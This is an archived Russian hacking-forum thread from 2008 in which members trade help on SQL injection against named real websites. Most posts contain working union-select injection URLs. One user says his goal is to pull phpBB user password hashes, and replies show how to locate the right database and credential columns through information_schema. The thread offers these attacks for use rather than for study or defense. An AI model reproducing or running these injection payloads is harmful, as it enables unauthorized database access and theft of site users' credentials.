HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.06.2008, 07:44
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

gisTy
очень интересно... о чем пишет данная ошибка.. а так хз. пробвал конверт. тоже самое
 
Ответить с цитированием

  #2  
Старый 16.06.2008, 08:46
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

2 gisTy таблица пустая:
_http://www.women-medcenter.ru/index.phtml?id=-25999'+union+select+1,count(*)+from+user/*
 
Ответить с цитированием

  #3  
Старый 16.06.2008, 11:36
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Ershik, такая ситуация неоднократно расписывалась, объяснение в чем причина и решение проблемы - http://forum.antichat.ru/showpost.php?p=497033

Последний раз редактировалось 0nep@t0p; 16.06.2008 в 11:39..
 
Ответить с цитированием

  #4  
Старый 16.06.2008, 12:03
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Понял, спасибо.
Я хочу вытащить с помощью игьекции хеши из форума phpbb2.
Они вместе в одной базе данных.
Составляю запрос по типу:
http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(char(58,58),us ername,user_password),7,8,9,10,11,12+from+phpbb_us ers+limit+1,1/*
Цитата:
Ошибка получения информации из базы данных.Table 'gelezo2.phpbb_users' doesn't exist
Как действовать в этом случае?
 
Ответить с цитированием

  #5  
Старый 16.06.2008, 12:07
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

doesn't exist - не существует

Цитата:
Как действовать в этом случае?
Подбирай таблицу. С суфиксами пробуй.

Последний раз редактировалось .Begemot.; 16.06.2008 в 12:10..
 
Ответить с цитированием

  #6  
Старый 16.06.2008, 12:39
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Я знаю, что нет.
Есть таблица phpbb_users, но нет таблицы gelezo2.phpbb_users
Мускуль 5.0.45 через лимит вытащил таблицу. Поля username и user_password вытащил.
Собрался составить запрос, чтобы вытащить данные.
Не дала,

Последний раз редактировалось Ershik; 16.06.2008 в 12:42..
 
Ответить с цитированием

  #7  
Старый 16.06.2008, 13:19
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

Цитата:
Сообщение от Ershik  
Я знаю, что нет.
Есть таблица phpbb_users, но нет таблицы gelezo2.phpbb_users
Мускуль 5.0.45 через лимит вытащил таблицу. Поля username и user_password вытащил.
Собрался составить запрос, чтобы вытащить данные.
Не дала,
ну ты сам на свой вопрос и ответил. Таблицы phpbb_users именно в этой базе нет... когда вытаскивал название таблиц ... надо было ещо и table_schema глянуть а не только table_name
 
Ответить с цитированием

  #8  
Старый 16.06.2008, 19:31
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

PHP код:
union+select+1,2,concat_ws(0x3a,table_name,table_schema),4,5+from+information_schema.columns+where+column_name+like+CHAR(37,112,97,115,37)+limit+0,1/* 
Удобно при поиске таблиц, содержащих в себе поля в которых есть сочетание "pas"
Red sps.
 
Ответить с цитированием

  #9  
Старый 16.06.2008, 21:55
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от Ershik  
Составляю запрос по типу:
http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(char(58,58),us ername,user_password),7,8,9,10,11,12+from+phpbb_us ers+limit+1,1/*
я недавно с таким сталкивался.. просто таблица phpbb_users находится в другой ДБ..
собственно вот запрос:
Код:
http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(0x2e,table_schema,table_name),7,8,9,10,11,12+from+information_schema.tables+where+table_name=0x70687062625f7573657273+limit+1,1/*
так узнаем имя той ДБ, где висит табличка phpbb_users, что нам и надо, и составляем запрос на выборку из этой таблички.
 
Ответить с цитированием

  #10  
Старый 18.06.2008, 01:34
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

http://darkbrotherhood.ru/index.php?charakter=&type=&p=articles&area=1&categ =&ud=&selby=&show=&pp=1'&page=1&PHPSESSID=810a244f 15bdf6a24b5889fe90dde026
Бошка не варит у мя совсем(((
подскажите
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ